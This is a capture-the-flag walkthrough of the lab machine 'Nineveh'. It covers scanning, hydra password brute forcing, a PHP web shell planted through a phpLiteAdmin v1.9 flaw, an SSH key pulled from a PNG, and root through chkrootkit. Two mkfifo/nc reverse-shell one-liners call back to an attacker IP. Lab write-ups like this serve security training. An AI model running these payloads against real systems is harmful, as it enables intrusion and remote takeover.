Starting with masscan
# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.43 Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-06 05:14:39 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 443/tcp on 10.10.10.43 Discovered open port 80/tcp on 10.10.10.43
Two web ports are open with SSL and without SSL.
Lets explore without SSL (port 80) first. To start with we will try gobuster
# gobuster -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 Gobuster v1.4.1 OJ Reeves (@TheColonial) ===================================================== ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.43/ [+] Threads : 30 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 301,302,307,200,204 ===================================================== /department (Status: 301)
We found one directory /department. Browse it
Hmm a login page, we can try few login details like admin/admin, guest/guest, admin/password, etc. But in this case none worked. So lets checkout source to see if we find anything interesting.
We see a message from amrois user to admin requesting to fix the login page.
Although amrois is talking about some problem in login page, I am not sure what is wrong with the login page. Therefore, I thought of using hydra against the login page.
The login page gives an error like “Invalid username” and “Invalid password”. This helps to find the right username and password. Quickly I was able to find that the username is admin. For password, I use hydra as following
# hydra -l 'admin' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. -- snip -- [DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid [STATUS] 675.00 tries/min, 675 tries in 00:00h, 0 to do in 01:00h, 14343723 active [STATUS] 684.00 tries/min, 2052 tries in 00:00h, 0 to do in 03:00h, 14342346 active [http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t 1 of 1 target successfully completed, 1 valid password found -- snip --
We got the password 1q2w3e4r5t.
Login with user admin and above password.
There is only one useful tab called Notes. If we click on it, we see following message.
Have you fixed the login page yet! hardcoded username and password is really bad idea! check your serect folder to get in! figure it out! this is your challenge Improve the db interface. ~amrois
Again, message from amrois. He is asking same thing and giving us hint to find the secret folder.
If we look at the URL for Notes, it is http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt . May be we can exploit it with LFI,RFI, etc. We will check it out later.
That’s it for port 80 for now. Lets forget for it now and move to port 443
# gobuster -u https://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -k Gobuster v1.4.1 OJ Reeves (@TheColonial) ===================================================== ===================================================== [+] Mode : dir [+] Url/Domain : https://10.10.10.43/ [+] Threads : 30 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 307,200,204,301,302 ===================================================== /db (Status: 301)
We got /db folder. Lets browse it
We see a phpLiteAdmin page. Here we discover the version of phpliteadmin is v1.9 and we also discover the full path because of error line on the top.
Again, using hydra to find the password
# hydra -l '' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -- snip -- [DATA] attacking http-post-forms://10.10.10.43:443//db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password. [STATUS] 192.00 tries/min, 192 tries in 00:00h, 0 to do in 01:00h, 14344206 active [STATUS] 185.33 tries/min, 556 tries in 00:00h, 0 to do in 03:00h, 14343842 active [STATUS] 188.43 tries/min, 1319 tries in 00:00h, 0 to do in 07:00h, 14343079 active [http-post-form] host: 10.10.10.43 password: password123
Nice, we got the password ie password123. Use it and enter
If you check on searchploit then you will see a vulnerability in phpliteadmin v1.9 which allow executing PHP code if we rename database with PHP file extension.
Create a database called ninevehNotes.php and create a table with the following content and TYPE=TEXT. The content of the table is as follows
<?php echo system($_REQUEST["cmd"]); ?>
Now get back to port 80 and use above as following
We got command execution!!
If we go to the following address, we see secure_notes folder, inside it there is a png file ie ninevh.png
Go to the following address and save the file, use binwalk to see if it conceals any secrets
# binwalk -e nineveh.png DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced 84 0x54 Zlib compressed data, best compression 2881744 0x2BF8D0 POSIX tar archive (GNU)
we see tar file is there
# cd _nineveh.png.extracted/ # ls 2BF8D0.tar 54 54.zlib secret # cd secret/ # ls nineveh.priv nineveh.pub
Nice, private and public key.
Lets get a shell. urlencode following
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
and use the output with the URL. Make sure to listen for shell in another terminal
We will get a shell. Now we can use the private key we found before. Save it as anything you like, set permission to 400 and SSH
[email protected]:/dev/shm$ chmod 400 a.key [email protected]:/dev/shm$ ssh -i a.key [email protected] Could not create directory '/var/www/.ssh'. The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 133 packages can be updated. 66 updates are security updates. You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14 [email protected]:~$ whoami amrois
We are amrois user now.
After getting the amrois user, we need to find the way to root. To do it, I search for files/folders owned by amrois user
[email protected]:~$ find / -user amrois 2> /dev/null -- snip -- /report /usr/sbin/report-reset.sh -- snip --
Among all of the result above seems to be interesting. Checking the /report folder
[email protected]:/report$ ls -lh total 64K -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:40 report-19-07-06:02:40.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:41 report-19-07-06:02:41.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:42 report-19-07-06:02:42.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:43 report-19-07-06:02:43.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:44 report-19-07-06:02:44.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:45 report-19-07-06:02:45.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:46 report-19-07-06:02:46.txt -rw-r--r-- 1 amrois amrois 4.8K Jul 6 02:47 report-19-07-06:02:47.txt
Open one of the file, you will realize that the file is the log of chkrootkit. I then checked if the user is running any cronjob because the above result shows that the script is executing after some interval of time. I assumed that the process is ran by some other user ie root.
There is a known issue with chkrootkit. If we create a file in /tmp directory name update, then chkrootkit with executing it as root if it is running by root user.
To test this I create a file /tmp/update and inserted following
#!/bin/bash rm /tmp/gf;mkfifo /tmp/gf;cat /tmp/gf|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/gf
Listen for the shell and after sometime you will get a shell
# nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.14.44] from (UNKNOWN) [10.10.10.43] 59452 bash: cannot set terminal process group (30132): Inappropriate ioctl for device bash: no job control in this shell [email protected]:~# whoami whoami root
Lets check if there is any cronjob running by root user
[email protected]:~# crontab -l */1 * * * * /root/vulnScan.sh
Indeed, what is the content?
[email protected]:~# cat /root/vulnScan.sh cat /root/vulnScan.sh #!/bin/bash /usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt
That’s all, but wait…why assuming, chkrootkit might be running with any other user. That’s right. I have assumed it here and it worked. Alternatively, we can check the process every minute using python script or use tool like pspy